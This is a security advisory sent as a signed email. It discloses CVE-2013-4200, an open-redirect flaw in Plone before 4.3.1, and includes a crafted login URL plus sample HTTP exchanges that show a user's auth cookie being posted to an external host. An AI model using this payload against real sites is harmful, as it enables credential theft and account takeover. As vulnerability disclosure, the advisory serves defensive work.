CVE-2013-4200 - Plone URL redirection / Forwarding of cookie dat
--PGP_Universal_6E9229FA_03C2AA2D_C460C78C_0EAD7DFF
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: QUOTED-PRINTABLE
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Plone CMS
# Vendor: Plone Foundation (http://plone.org)
# ID(s): CSNC-2013-013, CVE-2013-4200
# Subject: URL Redirection Vulnerability
# Risk: High
# Effect: Remotely exploitable
# Author: Cyrill Bannwart <cyrill.bannwart@csnc.ch>
# Date: 20/05/2013
#
#############################################################
Introduction:
-------------
The discovered vulnerability targets the open source Plone CMS. The
credentials of a valid user can be obtained by using a specially
crafted URL which can be sent to the user by email. When clicking on
the URL, the user is presented with the website's login form and after
a successful login the user as well as his credentials are forwarded to
an external server. This vulnerability can be used by an attacker to
obtain access to a user's account.
Affected:
---------
Vulnerable:
* Plone < 4.3.1
=20
Technical Description:
----------------------
An attacker can craft a URL for the login form where his victim has
valid credentials. The created URL contains a redirection URL to which
the user as well as his credentials are forwarded after a successful
login. This URL can be sent to the victim by mail.
By inserting a space before the redirection URL the isURLInPortal()
method of the URLTool class assumes the URL to be relative, not
filtering it against the allow_external_login_sites property.
Example of crafted URL:
https://example.com/acl_users/credentials_cookie_auth/require_login?next=3D=
+https%3A//www.csnc.ch
Once the victim clicks on the URL and logs in, a self-submitting POST
form is loaded that sends the user and his credentials to the external
server.
Example excerpt of HTTP Response:
HTTP/1.1 200 OK
Set-Cookie: __ac=3D"<CREDENTIALS>"; Path=3D/; HTTPOnly
[CUT]
<form method=3D"post" id=3D"external_login_form" name=3D"external_login_for=
m" action=3D" " rel="nofollow">https://www.csnc.ch">
<input type=3D"hidden" name=3D"__ac" value=3D"<CREDENTIALS>" />
</form>
<script type=3D"text/javascript">
/*jslint browser: true */
var external_login_form =3D document.forms.external_login_form;
external_login_form.style.display =3D 'none';
external_login_form.submit();
</script>
And resulting HTTP POST Request:
POST / HTTP/1.1
Host: www.csnc.ch
Referer: https://www.example.com/login_form
[CUT]
__ac=3D<CREDENTIALS>
The obtained credentials / cookie content can be used by the attacker to
login to the website and gain access to the victim's account.
The login form allows further URL parameters such as the password reset
link or the sign up URL that can also be tricked into accepting
non-relative URLs.
Workaround / Fix / Patch:
-------------------------
Patch has been released by vendor
Timeline:
---------
2013-05-08: Vulnerability discovered
2013-05-20: Vendor notified
2013-05-21: Vendor acknowledged
2013-06-18: Patch released
2013-07-02: Patch updated
2014-01-16: Disclosure
References:
-----------
https://plone.org/products/plone/security/advisories/20130618-announcement=
=20
https://bugzilla.redhat.com/show_bug.cgi?id=3DCVE-2013-4200
--PGP_Universal_6E9229FA_03C2AA2D_C460C78C_0EAD7DFF
Content-Type: application/x-pkcs7-signature;
name="smime.p7s"
Content-Transfer-Encoding: BASE64
Content-Disposition: attachment;
filename="smime.p7s"
MIIUbgYJKoZIhvcNAQcCoIIUXzCCFFsCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCCEisw
ggX7MIIE46ADAgECAg8UfWk+WS1zUuKnrVuz6DMwDQYJKoZIhvcNAQEFBQAwVTELMAkGA1UEBhMC
Q0gxFTATBgNVBAoTDFN3aXNzU2lnbiBBRzEvMC0GA1UEAxMmU3dpc3NTaWduIFBlcnNvbmFsIFNp
bHZlciBDQSAyMDA4IC0gRzIwHhcNMTIwODIwMTMzNzE1WhcNMTUwODIwMTMzNzE1WjBJMR0wGwYD
VQQLExRFbWFpbCBWYWxpZGF0ZWQgT25seTEoMCYGA1UEAxQfRW1haWw6IGFsZXhhbmRyZS5oZXJ6
b2dAY3NuYy5jaDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALqVR5S0xl0UAv+6gtSt
e1I3nnc5+hUMrkI2r2L9xjYlTeZHBFdiUwbQtb6dFBEiBezHL1Po1fYANgpiSmEqBAX5pSesw1Zw
tyM8BXn5iHb+V0nuExh0sdJPzwNzDtDhGA3RvqvCbUQO7yjEMTmbj/n9ZpBbDaUstP6qG93aOKUo
IAnkG/KL1NulzNlVB/V2basvfN6N+RDQn/Rdm7xhdb9yxTGEk5dwde3TVHybHT9l/+9n/DRa2NGb
R2VEn+2JNJSaXfqWuVnLmpBd2WgJMoWj9SESNw/m3JHkIEmQZPS+ZD2U/6QZ4rJxJFIRfG//bdvv
Xd9FzQhJE5y7/X0OBYkCAwEAAaOCAtIwggLOMA4GA1UdDwEB/wQEAwIEsDATBgNVHSUEDDAKBggr
BgEFBQcDBDAdBgNVHQ4EFgQU4s2q9ipX6Z3a/8IknZDSIoAnSXUwHwYDVR0jBBgwFoAU6zWxVm0V
YFj04SLNHEYcrtAEAGUwgf8GA1UdHwSB9zCB9DBHoEWgQ4ZBaHR0cDovL2NybC5zd2lzc3NpZ24u
bmV0L0VCMzVCMTU2NkQxNTYwNThGNEUxMjJDRDFDNDYxQ0FFRDAwNDAwNjUwgaiggaWggaKGgZ9s
ZGFwOi8vZGlyZWN0b3J5LnN3aXNzc2lnbi5uZXQvQ049RUIzNUIxNTY2RDE1NjA1OEY0RTEyMkNE
MUM0NjFDQUVEMDA0MDA2NSUyQ089U3dpc3NTaWduJTJDQz1DSD9jZXJ0aWZpY2F0ZVJldm9jYXRp
b25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwZAYDVR0gBF0wWzBZ
BglghXQBWQEDAQQwTDBKBggrBgEFBQcCARY+aHR0cDovL3JlcG9zaXRvcnkuc3dpc3NzaWduLmNv
bS9Td2lzc1NpZ24tU2lsdmVyLUNQLUNQUy1SNC5wZGYwgdkGCCsGAQUFBwEBBIHMMIHJMGQGCCsG
AQUFBzAChlhodHRwOi8vc3dpc3NzaWduLm5ldC9jZ2ktYmluL2F1dGhvcml0eS9kb3dubG9hZC9F
QjM1QjE1NjZEMTU2MDU4RjRFMTIyQ0QxQzQ2MUNBRUQwMDQwMDY1MGEGCCsGAQUFBzABhlVodHRw
Oi8vc2lsdmVyLXBlcnNvbmFsLWcyLm9jc3Auc3dpc3NzaWduLm5ldC9FQjM1QjE1NjZEMTU2MDU4
RjRFMTIyQ0QxQzQ2MUNBRUQwMDQwMDY1MCMGA1UdEQQcMBqBGGFsZXhhbmRyZS5oZXJ6b2dAY3Nu
Yy5jaDANBgkqhkiG9w0BAQUFAAOCAQEAZeCO3sFVqf5Pv8dKExUN4DsukKwEfhYis7JgmIVwzYh7
7od8WfsexqL904pvuPKN5NYbW2M7gWBBV6m6mhFDhFM2mKGkeO/een3xrznoYaNsdcZAmIFeiL7e
daJ+cLbJDSreER6pHuzZmcfMUZxotylaYCqKJ1J73RWaUFQwBZg/lO0mErC3uZQr9IdJppAzy8d/
zb9qTBCNDGNPjY0ks1xyXIF9DEXAw0AiweNVAs5kOcMVB7gNFLJazRXcMrVmzo3jpzgB0EGnmsUE
+lTjn4XKVQzgiYPmhYwZrYCDECtQiSilSkBQfauYgF8dKrGiih0sOJLU3ZC5HysqeZKdWjCCBmcw
ggRPoAMCAQICCQDiVrdTl2t2WDANBgkqhkiG9w0BAQUFADBHMQswCQYDVQQGEwJDSDEVMBMGA1UE
ChMMU3dpc3NTaWduIEFHMSEwHwYDVQQDExhTd2lzc1NpZ24gU2lsdmVyIENBIC0gRzIwHhcNMDgw
NzA5MTExMTA5WhcNMjMwNzA5MTExMTA5WjBVMQswCQYDVQQGEwJDSDEVMBMGA1UEChMMU3dpc3NT
aWduIEFHMS8wLQYDVQQDEyZTd2lzc1NpZ24gUGVyc29uYWwgU2lsdmVyIENBIDIwMDggLSBHMjCC
ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAPfzU15JbYwD5ScXIRhgpXaUPxUQuCFAzzYz
rCpymo9hw2veekkIWD2A2DvwnR1BEAG/awdWGo2zPb9jujF+4nJGGGiH14VPoMl7E6nQOdGJ1jVn
aHbBX5YJzc86BdE/BgUK2hbyQ/KkBx2irIB1AZ2g6Pc0p7+25jloZlJHOSlNtJ3oKq0VYbSiMeAQ
kdse5EPxK94QwTTLbITuYhQnRNgx8d88IczArJBo03RoyRdKjjsJp7EFZY0HpJCuLnreekRvsAL+
dP8ah/VY6aYl8cyIIifYyzHBLygMcXIe9/sITm56Bawhfz8KWmb4v+UWFPkbm8SfujMNhpcVXa6h
Bo8CAwEAAaOCAkYwggJCMA4GA1UdDwEB/wQEAwIBBjASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1Ud
DgQWBBTrNbFWbRVgWPThIs0cRhyu0AQAZTAfBgNVHSMEGDAWgBQXoM3B5EG2Ols7y0WdvRzCmPqG
WDCB/wYDVR0fBIH3MIH0MEegRaBDhkFodHRwOi8vY3JsLnN3aXNzc2lnbi5uZXQvMTdBMENEQzFF
NDQxQjYzQTVCM0JDQjQ1OURCRDFDQzI5OEZBODY1ODCBqKCBpaCBooaBn2xkYXA6Ly9kaXJlY3Rv
cnkuc3dpc3NzaWduLm5ldC9DTj0xN0EwQ0RDMUU0NDFCNjNBNUIzQkNCNDU5REJEMUNDMjk4RkE4
NjU4JTJDTz1Td2lzc1NpZ24lMkNDPUNIP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9v
YmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDBkBgNVHSAEXTBbMFkGCWCFdAFZAQMBAzBM
MEoGCCsGAQUFBwIBFj5odHRwOi8vcmVwb3NpdG9yeS5zd2lzc3NpZ24uY29tL1N3aXNzU2lnbi1T
aWx2ZXItQ1AtQ1BTLVIzLnBkZjB0BggrBgEFBQcBAQRoMGYwZAYIKwYBBQUHMAKGWGh0dHA6Ly9z
d2lzc3NpZ24ubmV0L2NnaS1iaW4vYXV0aG9yaXR5L2Rvd25sb2FkLzE3QTBDREMxRTQ0MUI2M0E1
QjNCQ0I0NTlEQkQxQ0MyOThGQTg2NTgwDQYJKoZIhvcNAQEFBQADggIBAC4qdtqX80zfZCfhWy2V
77lVLtu4CWUxQLBLvXyQsdnYcRhTzug1LJsUuh90gtRXksBXk5tQBSV74JXUXbhEeOkzkEH+4b9G
m3l9crw4UBnAaFoGstMb3l1nz2mS+PWsCYXU3Vouajkj7/Tvc1o2HsPpjSBHZDcfOXkT1w5Qsqy6
GZ7qg+RFRgS+zS85EAibDYnwVbImJFGza9F8aT1Y1YE1PGhHV43GErPPKmoVRS+EqU49wTnK6/ve
SpytG7hhlgYguIAjGbR2Qxyfrpo4XhDSOPUentkMEdUu+MmKh6cMs9IoXSNsTmYF8ZhjoNxigcRH
4nKi4G0Zfj1dhUWXaIADpfD17duYgs7pppba32412hkDYPawR5gDNOW8YLTAkMAo9ARuPLn6SYc6
ZTi0tWGCHoYh75qIxXUoNateUmAvOu8xi6Z790gMcDy112LLtELD9I24RHGMJPzX7p8h6KpjlsPP
B1vygdKacCdUGMzuodEMIo5e0JlDOapSTmcbj9oyvFqDkto2q1N69BF36vzX6N7ql8ZuUA4PRODP
MMqLmqGgp/y56MUt83P1VP6dKNeQIyMpT0kzf5B5g0peHmGRZgQYXdGIb4wuIVtlAUTNdkkAABDy
GhKlHca2BX6IFqI2AqMpoXirJF3wCnQNZNoKeZoVYUhV3kYEubkE26qWMIIFvTCCA6WgAwIBAgII
TxvUL1S7L0swDQYJKoZIhvcNAQEFBQAwRzELMAkGA1UEBhMCQ0gxFTATBgNVBAoTDFN3aXNzU2ln
biBBRzEhMB8GA1UEAxMYU3dpc3NTaWduIFNpbHZlciBDQSAtIEcyMB4XDTA2MTAyNTA4MzI0NloX
DTM2MTAyNTA4MzI0NlowRzELMAkGA1UEBhMCQ0gxFTATBgNVBAoTDFN3aXNzU2lnbiBBRzEhMB8G
A1UEAxMYU3dpc3NTaWduIFNpbHZlciBDQSAtIEcyMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
CgKCAgEAxPGHf9N4Mfc4yfjDmUO8x/e8N+dOcbpLj6VzHVxumK4DV644N0MvFz0fyM5oEMF4rhkD
KxD6LHmD9ui5aLlV8gREpzn5/ASLHvGiTSf5YXu6t+WiE7brYT7QbNHm+/pe7R20nqA1W6GSy/BJ
kv6FCgU+5tkL4k+73JU3/JHpMjUi0R86TieFnbAVlDLaYQ1HTWBCrpJH6INaUFjpiou5XaHc3ZlK
HzZnu0jkg7Y360g6rw9njxcH6ATK72oxh9TAtvmUcXtnZLi2kUpCe2UuMGoM9ZDulebyzYLs2aFK
7PayS+VFheZteJMELpyCbTapxDFkH4aDCyr0NQp4yVXPQbBH6TCfmb5hqAaEuSh6XzjZG6k4sIN/
c8HDO0gqgg8hm7jMqDXDhBuDsz6+pJVpATqJAHgE2cn0mRmrVn5bi4Y5FZGkECwJMoBgs5PAKrYY
C51+jUnyEEp/+dVGLxmSo5mnJqy7jDzmDrxHB9xzUfFwZC8I+bRHHTBsROopN4WSaGa8gzj+ezku
01DwH/teYLappvonQfGbGHLy9YR0SslnxFSuSGTfjNFusB3hB48IHpmccelM2KX3RxIfdNFRnobz
wqIjQAtz20um53MGjMGg6cFZrEb65i/4z3GcRm25xBWNOHkDRUjvxF3XCO6HOSKGsg0PWEP3calI
Lv3q1h8CAwEAAaOBrDCBqTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4E
FgQUF6DNweRBtjpbO8tFnb0cwpj6hlgwHwYDVR0jBBgwFoAUF6DNweRBtjpbO8tFnb0cwpj6hlgw
RgYDVR0gBD8wPTA7BglghXQBWQEDAQEwLjAsBggrBgEFBQcCARYgaHR0cDovL3JlcG9zaXRvcnku
c3dpc3NzaWduLmNvbS8wDQYJKoZIhvcNAQEFBQADggIBAHPGgeAn0i0P4JUw4ppBf1AsX19iYamG
amkYDHRJ1l2E6kFSGG9YrVBWIGrGvShpWJHckRE1qTodvBqlYJ7YH39FkWnZfrt4csEGDyrOj4Vw
YaygzQu4OSlWhDJOhrs9xCrZ1x9y7v5RoSJBsXECYxqCsGKrXlcSH9/L3XWgwF15kIwb4FDm3jH+
mHtwX6WQ2K34ArZv02DdQEsixT2tOnqfGhpHkXkzuoLcMmkDlm4fS/Bx/uNncqCxv1yL5PqZIseE
uRuNI5c/7SXgz2W79WEE790eslpBIlqhn10s6FvJbakMDHiqYMZWjwFaDGi8aRl5xB9+lwW/xekk
UV7U1UtT7dkjWjYDZaPBA61BMPNGG4WQr2W11bHkFlt4dR2Xem1ZqSqPe97Dh4kQmUlzeMg9vVE1
dCrV8X5pGyq7O70luJpaPXJhkGaH7gzWTdQRdAtq/gsD/KNVV4n+SsuuWxcFyPKNIzFTONItaj+C
uY0IavdeQXRuwxF+B6wpYJE/OMpXEA29MC/HpeZBoNquBYeaoKRlbEwJDIm6uNO5wJOKMPqN5Zpr
FQFOZ6raYlY+hAhm0sQ2fac+EPyI4NSA5QC9qvNOBqN6avlicuMJT+ubDgEj8Z+7fNzcbBGXJbLy
tGMU0gYqZ4yD9c7qB9iaah7s5Aq7KkzrCWA5zspi2C5uMYICCzCCAgcCAQEwaDBVMQswCQYDVQQG
EwJDSDEVMBMGA1UEChMMU3dpc3NTaWduIEFHMS8wLQYDVQQDEyZTd2lzc1NpZ24gUGVyc29uYWwg
U2lsdmVyIENBIDIwMDggLSBHMgIPFH1pPlktc1Lip61bs+gzMAkGBSsOAwIaBQCgejAjBgkqhkiG
9w0BCQQxFgQUJf5a8Nq7/+BgaAfUxc0KC0C+cfYwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAc
BgkqhkiG9w0BCQUxDxcNMTQwMTE2MTIyNTQ3WjAbBgkqhkiG9w0BCQ8xDjAMMAoGCCqGSIb3DQMH
MA0GCSqGSIb3DQEBAQUABIIBAATxR8Ck6+lAHt1jdsvjEiCCMKf/NTpjB5ysR3S+33M1oCYwm46F
nrMJhcrW/B9Ls/L+tiiggTQkrQPxiVPVNnmc2LIhX+EK7kF+ipE4+gF2541QRep+vUCDH7SdhaJO
GXdy9EiQPrGTbM+AvSWoKcP3sZJpLmchONf0e18Q2bd/GeWpvsvqJWpcPwm3pDZYdLxzw9NhG1d9
+tCaWY/rHGVbqE+swMWQOulYWLfS9mzkntS5bMzKSA2SZKLxVT1pQOkfKDqfc7bPrjh8Usd5pbpG
RDpDl/9glsKvSrj7PZPKW6VuUJuXTlEFMRzNUM9kkuqlX0rCsUCx96IWdGpEbO4=
--PGP_Universal_6E9229FA_03C2AA2D_C460C78C_0EAD7DFF--